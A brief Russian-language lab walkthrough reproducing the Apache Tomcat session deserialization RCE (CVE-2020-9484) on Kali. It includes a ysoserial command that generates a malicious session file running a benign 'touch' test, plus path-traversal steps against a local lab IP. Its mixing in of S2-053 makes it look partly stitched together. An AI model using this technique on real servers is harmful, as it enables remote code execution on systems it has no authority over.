
Воспроизведение уязвимости выполнения кода при десериализации сессий Apache Tomcat с помощью Kali 2.0
Воспроизведение уязвимости удалённого выполнения кода при десериализации сессий Apache Tomcat (CVE-2020-9484) с помощью Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
Сначала откройте S2-053, чтобы убедиться, что он запущен корректно:
http://192.168.152.128:8080/s2-053/
Повторно откройте страницу, перехватите запрос и с помощью Intruder выполните обход пути (path traversal)


Команда выполнена успешно:
